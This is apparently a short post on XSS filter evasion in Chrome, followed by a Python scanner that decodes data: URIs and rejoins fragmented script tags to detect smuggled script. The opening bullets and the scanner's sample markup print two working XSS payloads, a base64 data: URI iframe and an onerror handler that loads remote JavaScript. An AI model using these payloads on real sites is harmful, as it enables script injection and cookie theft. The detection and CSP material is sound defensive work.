- Choosing Google Chrome as the target browser requires bypassing XSS Auditor, its built-in anti-XSS filter. As discovered by Mario Heiderich, a data: URI carrying base64-encoded content can be leveraged to bypass the filter:
```html
<html>
<body>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
</body>
</html>
```
- A Chrome extension can override the default SOP restrictions: it can issue cross-domain requests and read the HTTP response, access other browser tabs, and read every cookie, including those marked HttpOnly.
- JS injection (the `<script>` tag is assembled from string fragments inside the `onerror` handler):
```html
<img/src='a'onerror='document.write("<scr","ipt/type=\"text/JavaScript\"/src=\"","http://www.example.com/onetime.js","\"></script>")'>
```
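Both payload shapes above (the base64 data: URI in an iframe, and the `<script>` tag pieced together from string fragments inside an `onerror` handler) are invisible to a scanner that only greps for `<script` in the raw markup. The Python below is an added example, not code from the original post: it uses only the standard library, decodes data: URIs the way the browser would, re-joins `"<scr","ipt"`-style fragment concatenation before matching, and reports the tag and attribute that smuggle script. The sample page it scans is constructed for the example and reuses the two payloads from the post plus a benign data:image/png pixel to show what is not flagged.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# Constructed sample markup: the two payload shapes from the post plus
# harmless elements that a good scanner must leave alone.
SAMPLE_HTML = r"""
<p>hello</p>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>
<img/src='a'onerror='document.write("<scr","ipt/type=\"text/JavaScript\"/src=\"","http://www.example.com/onetime.js","\"></script>")'>
<img src="data:image/png;base64,iVBORw0KGgo=" alt="pixel">
<img src="logo.png" alt="ok">
"""

# data:<header>,<payload>; header holds the MIME type and optional ;base64
DATA_URI_RE = re.compile(r"^\s*data:([^,]*),(.*)$", re.IGNORECASE | re.DOTALL)
# What counts as "script" once a value has been decoded / re-assembled
SCRIPTISH_RE = re.compile(r"<\s*script|javascript\s*:|document\.write", re.IGNORECASE)
# A string literal boundary such as  ","  or  ','  between two fragments
FRAGMENT_JOIN_RE = re.compile(r"""["']\s*,\s*["']""")
# Attributes whose value is fetched or navigated to as a URL
URL_ATTRS = {"src", "href", "data", "action"}
# MIME types that execute script when rendered from a data: URI
ACTIVE_MIME = {"text/html", "image/svg+xml"}


def decode_data_uri(value):
    """Return (mime, decoded_text) for a data: URI, or None for anything else.
    Base64 payloads are decoded; malformed base64 decodes to an empty string."""
    m = DATA_URI_RE.match(value)
    if not m:
        return None
    header, payload = m.group(1), m.group(2)
    parts = [p.strip().lower() for p in header.split(";")]
    mime = parts[0]
    if "base64" in parts[1:]:
        try:
            text = base64.b64decode(payload).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            text = ""
    else:
        text = unquote(payload)
    return mime, text


def join_fragments(js):
    """Collapse "<scr","ipt" style concatenation so the assembled text is visible."""
    return FRAGMENT_JOIN_RE.sub("", js)


class SmuggledScriptScanner(HTMLParser):
    """Collects (tag, attribute, reason) for attributes that carry script
    through a data: URI, a javascript: URL, or an inline event handler."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None:
                continue
            lname = name.lower()
            if lname.startswith("on"):
                reason = ("handler assembles script"
                          if SCRIPTISH_RE.search(join_fragments(value))
                          else "inline event handler")
                self.findings.append((tag, lname, reason))
            elif lname in URL_ATTRS:
                if value.strip().lower().startswith("javascript:"):
                    self.findings.append((tag, lname, "javascript: URL"))
                    continue
                decoded = decode_data_uri(value)
                if decoded is None:
                    continue
                mime, text = decoded
                if SCRIPTISH_RE.search(text):
                    self.findings.append((tag, lname, "data: URI decodes to script"))
                elif mime in ACTIVE_MIME:
                    self.findings.append((tag, lname, "data: URI with active content type"))


def scan_html(markup):
    """Parse markup and return the list of findings."""
    scanner = SmuggledScriptScanner()
    scanner.feed(markup)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for tag, attr, reason in scan_html(SAMPLE_HTML):
        print(f"{tag}[{attr}]: {reason}")
```

Using the stdlib `HTMLParser` rather than a regex over the raw tag matters here: the `onerror` value contains a literal `>` inside `</script>`, and an ad-hoc `<[^>]*>` tokenizer would cut the tag short and never see the handler. A scanner like this complements, rather than replaces, a Content-Security-Policy whose `frame-src` excludes `data:` and whose `script-src` excludes inline handlers.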